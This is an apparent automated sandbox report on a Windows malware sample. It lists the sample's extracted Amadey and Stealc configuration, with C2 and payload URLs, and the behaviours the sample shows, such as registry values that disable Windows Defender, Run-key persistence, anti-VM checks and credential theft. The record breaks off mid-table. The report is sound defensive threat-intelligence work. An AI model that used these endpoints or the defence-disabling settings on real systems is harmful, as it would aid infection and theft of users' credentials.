Analysis
-
max time kernel
150s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
05/03/2025, 21:37
Static task
static1
Behavioral task
behavioral1
Sample
f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe
Resource
win10v2004-20250217-en
General
-
Target
f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe
-
Size
938KB
-
MD5
865b70535cac91a7fb0a5e7453798edc
-
SHA1
bf3e1c9613ef801ad1ff939717bce851cc555282
-
SHA256
f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c
-
SHA512
73bf144459c82e83a2cd039d9ca2002268bc8df2aa19ff80fc5d0feb722c8dd38974daad5b8d9a9069d9cf5bb9220582cce1e8fc907f3090677ff2bbd4149138
-
SSDEEP
24576:AqDEvCTbMWu7rQYlBQcBiT6rprG8a0Xu:ATvC/MTQYxsWR7a0X
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/4336-759-0x00000000004D0000-0x000000000092E000-memory.dmp healer behavioral2/memory/4336-758-0x00000000004D0000-0x000000000092E000-memory.dmp healer behavioral2/memory/4336-1133-0x00000000004D0000-0x000000000092E000-memory.dmp healer -
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 50fb815cca.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 50fb815cca.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 50fb815cca.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 50fb815cca.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 50fb815cca.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 50fb815cca.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 50fb815cca.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 50fb815cca.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications 50fb815cca.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 50fb815cca.exe -
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 830c86897e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 50fb815cca.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempVZWPAG7XO9TWOBDDKQAL4VS7AB6VEUAS.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 6c0e2e5698.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ WZLW29H72194G4Y5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempSODOBIM89EGYMFGSDQOLFHAHQ3AL1SOE.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 4 IoCs
flow pid Process 13 5336 powershell.exe 36 5796 powershell.exe 37 3944 powershell.exe 38 1732 powershell.exe -
pid Process 3944 powershell.exe 1768 powershell.exe 2128 powershell.exe 4360 powershell.exe 4316 powershell.exe 1732 powershell.exe 5336 powershell.exe 5796 powershell.exe 3944 powershell.exe -
Downloads MZ/PE file 9 IoCs
flow pid Process 36 5796 powershell.exe 38 1732 powershell.exe 80 5160 6c0e2e5698.exe 215 1064 rapes.exe 34 1064 rapes.exe 70 1064 rapes.exe 70 1064 rapes.exe 70 1064 rapes.exe 13 5336 powershell.exe -
Uses browser remote debugging 2 TTPs 1 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 4588 chrome.exe -
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempSODOBIM89EGYMFGSDQOLFHAHQ3AL1SOE.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6c0e2e5698.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 830c86897e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion WZLW29H72194G4Y5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 50fb815cca.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempSODOBIM89EGYMFGSDQOLFHAHQ3AL1SOE.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6c0e2e5698.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 830c86897e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion WZLW29H72194G4Y5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 50fb815cca.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempVZWPAG7XO9TWOBDDKQAL4VS7AB6VEUAS.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempVZWPAG7XO9TWOBDDKQAL4VS7AB6VEUAS.EXE -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation TempSODOBIM89EGYMFGSDQOLFHAHQ3AL1SOE.EXE Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation dll32.exe -
Executes dropped EXE 17 IoCs
pid Process 3320 TempSODOBIM89EGYMFGSDQOLFHAHQ3AL1SOE.EXE 1064 rapes.exe 1668 914e8f44cd.exe 1140 TempVZWPAG7XO9TWOBDDKQAL4VS7AB6VEUAS.EXE 3152 483d2fa8a0d53818306efeb32d3.exe 4556 rapes.exe 2104 ktxzLhN.exe 4492 dll32.exe 5160 6c0e2e5698.exe 4864 830c86897e.exe 1380 WZLW29H72194G4Y5.exe 4584 0ec1f6fe15.exe 5960 tempdatalogger.exe 1248 rapes.exe 4336 50fb815cca.exe 4020 ktxzLhN.exe 180 dll32.exe -
Identifies Wine through registry keys 2 TTPs 10 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine 50fb815cca.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine TempSODOBIM89EGYMFGSDQOLFHAHQ3AL1SOE.EXE Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine TempVZWPAG7XO9TWOBDDKQAL4VS7AB6VEUAS.EXE Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine 830c86897e.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine WZLW29H72194G4Y5.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine 6c0e2e5698.exe -
Loads dropped DLL 3 IoCs
pid Process 4492 dll32.exe 5960 tempdatalogger.exe 180 dll32.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 50fb815cca.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 50fb815cca.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\914e8f44cd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106670101\\914e8f44cd.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106680121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6c0e2e5698.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106970101\\6c0e2e5698.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\830c86897e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106980101\\830c86897e.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0ec1f6fe15.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106990101\\0ec1f6fe15.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\50fb815cca.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107000101\\50fb815cca.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 68 raw.githubusercontent.com 69 raw.githubusercontent.com 171 raw.githubusercontent.com 207 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 113 ip-api.com -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000b000000023bc1-53.dat autoit_exe behavioral2/files/0x0007000000023d51-294.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 1796 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
pid Process 3320 TempSODOBIM89EGYMFGSDQOLFHAHQ3AL1SOE.EXE 1064 rapes.exe 1140 TempVZWPAG7XO9TWOBDDKQAL4VS7AB6VEUAS.EXE 3152 483d2fa8a0d53818306efeb32d3.exe 4556 rapes.exe 5160 6c0e2e5698.exe 4864 830c86897e.exe 1380 WZLW29H72194G4Y5.exe 1248 rapes.exe 4336 50fb815cca.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempSODOBIM89EGYMFGSDQOLFHAHQ3AL1SOE.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 42 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempVZWPAG7XO9TWOBDDKQAL4VS7AB6VEUAS.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0ec1f6fe15.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 50fb815cca.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 830c86897e.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 0ec1f6fe15.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempSODOBIM89EGYMFGSDQOLFHAHQ3AL1SOE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6c0e2e5698.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WZLW29H72194G4Y5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 914e8f44cd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 0ec1f6fe15.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 672 timeout.exe 3352 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 592 taskkill.exe 1340 taskkill.exe 3752 taskkill.exe 216 taskkill.exe 3268 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000_Classes\Local Settings rapes.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6100 schtasks.exe 5868 schtasks.exe 2528 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5336 powershell.exe 5336 powershell.exe 3320 TempSODOBIM89EGYMFGSDQOLFHAHQ3AL1SOE.EXE 3320 TempSODOBIM89EGYMFGSDQOLFHAHQ3AL1SOE.EXE 1064 rapes.exe 1064 rapes.exe 5796 powershell.exe 5796 powershell.exe 1140 TempVZWPAG7XO9TWOBDDKQAL4VS7AB6VEUAS.EXE 1140 TempVZWPAG7XO9TWOBDDKQAL4VS7AB6VEUAS.EXE 1768 powershell.exe 1768 powershell.exe 1768 powershell.exe 2128 powershell.exe 2128 powershell.exe 2128 powershell.exe 4360 powershell.exe 4360 powershell.exe 3944 powershell.exe 3944 powershell.exe 3944 powershell.exe 1732 powershell.exe 1732 powershell.exe 1732 powershell.exe 3152 483d2fa8a0d53818306efeb32d3.exe 3152 483d2fa8a0d53818306efeb32d3.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4556 rapes.exe 4556 rapes.exe 2104 ktxzLhN.exe 2104 ktxzLhN.exe 4492 dll32.exe 4492 dll32.exe 4492 dll32.exe 4492 dll32.exe 4492 dll32.exe 4492 dll32.exe 4492 dll32.exe 4492 dll32.exe 4492 dll32.exe 4492 dll32.exe 4492 dll32.exe 4492 dll32.exe 4492 dll32.exe 4492 dll32.exe 4492 dll32.exe 4492 dll32.exe 4492 dll32.exe 4492 dll32.exe 4492 dll32.exe 5160 6c0e2e5698.exe 5160 6c0e2e5698.exe 5160 6c0e2e5698.exe 5160 6c0e2e5698.exe 5160 6c0e2e5698.exe 5160 6c0e2e5698.exe 4864 830c86897e.exe 4864 830c86897e.exe 1380 WZLW29H72194G4Y5.exe 1380 WZLW29H72194G4Y5.exe 4584 0ec1f6fe15.exe -
Suspicious use of AdjustPrivilegeToken 48 IoCs
description pid Process Token: SeDebugPrivilege 5336 powershell.exe Token: SeDebugPrivilege 5796 powershell.exe Token: SeDebugPrivilege 1768 powershell.exe Token: SeDebugPrivilege 2128 powershell.exe Token: SeDebugPrivilege 4360 powershell.exe Token: SeDebugPrivilege 3944 powershell.exe Token: SeDebugPrivilege 1732 powershell.exe Token: SeDebugPrivilege 4316 powershell.exe Token: SeDebugPrivilege 2104 ktxzLhN.exe Token: SeDebugPrivilege 4492 dll32.exe Token: SeDebugPrivilege 592 taskkill.exe Token: SeDebugPrivilege 1340 taskkill.exe Token: SeDebugPrivilege 3752 taskkill.exe Token: SeDebugPrivilege 216 taskkill.exe Token: SeDebugPrivilege 3268 taskkill.exe Token: SeDebugPrivilege 340 firefox.exe Token: SeDebugPrivilege 340 firefox.exe Token: SeDebugPrivilege 1796 tasklist.exe Token: SeDebugPrivilege 5960 tempdatalogger.exe Token: SeDebugPrivilege 4336 50fb815cca.exe Token: SeDebugPrivilege 4020 ktxzLhN.exe Token: SeDebugPrivilege 180 dll32.exe Token: SeShutdownPrivilege 4588 chrome.exe Token: SeCreatePagefilePrivilege 4588 chrome.exe Token: SeShutdownPrivilege 4588 chrome.exe Token: SeCreatePagefilePrivilege 4588 chrome.exe Token: SeShutdownPrivilege 4588 chrome.exe Token: SeCreatePagefilePrivilege 4588 chrome.exe Token: SeShutdownPrivilege 4588 chrome.exe Token: SeCreatePagefilePrivilege 4588 chrome.exe Token: SeShutdownPrivilege 4588 chrome.exe Token: SeCreatePagefilePrivilege 4588 chrome.exe Token: SeShutdownPrivilege 4588 chrome.exe Token: SeCreatePagefilePrivilege 4588 chrome.exe Token: SeShutdownPrivilege 4588 chrome.exe Token: SeCreatePagefilePrivilege 4588 chrome.exe Token: SeShutdownPrivilege 4588 chrome.exe Token: SeCreatePagefilePrivilege 4588 chrome.exe Token: SeShutdownPrivilege 4588 chrome.exe Token: SeCreatePagefilePrivilege 4588 chrome.exe Token: SeShutdownPrivilege 4588 chrome.exe Token: SeCreatePagefilePrivilege 4588 chrome.exe Token: SeShutdownPrivilege 4588 chrome.exe Token: SeCreatePagefilePrivilege 4588 chrome.exe Token: SeShutdownPrivilege 4588 chrome.exe Token: SeCreatePagefilePrivilege 4588 chrome.exe Token: SeShutdownPrivilege 4588 chrome.exe Token: SeCreatePagefilePrivilege 4588 chrome.exe -
Suspicious use of FindShellTrayWindow 38 IoCs
pid Process 2916 f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe 2916 f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe 2916 f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe 1668 914e8f44cd.exe 1668 914e8f44cd.exe 1668 914e8f44cd.exe 4584 0ec1f6fe15.exe 4584 0ec1f6fe15.exe 4584 0ec1f6fe15.exe 4584 0ec1f6fe15.exe 4584 0ec1f6fe15.exe 4584 0ec1f6fe15.exe 4584 0ec1f6fe15.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 4584 0ec1f6fe15.exe 4584 0ec1f6fe15.exe 4584 0ec1f6fe15.exe 4584 0ec1f6fe15.exe -
Suspicious use of SendNotifyMessage 37 IoCs
pid Process 2916 f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe 2916 f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe 2916 f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe 1668 914e8f44cd.exe 1668 914e8f44cd.exe 1668 914e8f44cd.exe 4584 0ec1f6fe15.exe 4584 0ec1f6fe15.exe 4584 0ec1f6fe15.exe 4584 0ec1f6fe15.exe 4584 0ec1f6fe15.exe 4584 0ec1f6fe15.exe 4584 0ec1f6fe15.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 340 firefox.exe 4584 0ec1f6fe15.exe 4584 0ec1f6fe15.exe 4584 0ec1f6fe15.exe 4584 0ec1f6fe15.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 340 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2916 wrote to memory of 4816 2916 f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe 86 PID 2916 wrote to memory of 4816 2916 f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe 86 PID 2916 wrote to memory of 4816 2916 f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe 86 PID 2916 wrote to memory of 5320 2916 f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe 87 PID 2916 wrote to memory of 5320 2916 f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe 87 PID 2916 wrote to memory of 5320 2916 f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe 87 PID 4816 wrote to memory of 6100 4816 cmd.exe 89 PID 4816 wrote to memory of 6100 4816 cmd.exe 89 PID 4816 wrote to memory of 6100 4816 cmd.exe 89 PID 5320 wrote to memory of 5336 5320 mshta.exe 91 PID 5320 wrote to memory of 5336 5320 mshta.exe 91 PID 5320 wrote to memory of 5336 5320 mshta.exe 91 PID 5336 wrote to memory of 3320 5336 powershell.exe 97 PID 5336 wrote to memory of 3320 5336 powershell.exe 97 PID 5336 wrote to memory of 3320 5336 powershell.exe 97 PID 3320 wrote to memory of 1064 3320 TempSODOBIM89EGYMFGSDQOLFHAHQ3AL1SOE.EXE 98 PID 3320 wrote to memory of 1064 3320 TempSODOBIM89EGYMFGSDQOLFHAHQ3AL1SOE.EXE 98 PID 3320 wrote to memory of 1064 3320 TempSODOBIM89EGYMFGSDQOLFHAHQ3AL1SOE.EXE 98 PID 1064 wrote to memory of 1668 1064 rapes.exe 102 PID 1064 wrote to memory of 1668 1064 rapes.exe 102 PID 1064 wrote to memory of 1668 1064 rapes.exe 102 PID 1668 wrote to memory of 1416 1668 914e8f44cd.exe 103 PID 1668 wrote to memory of 1416 1668 914e8f44cd.exe 103 PID 1668 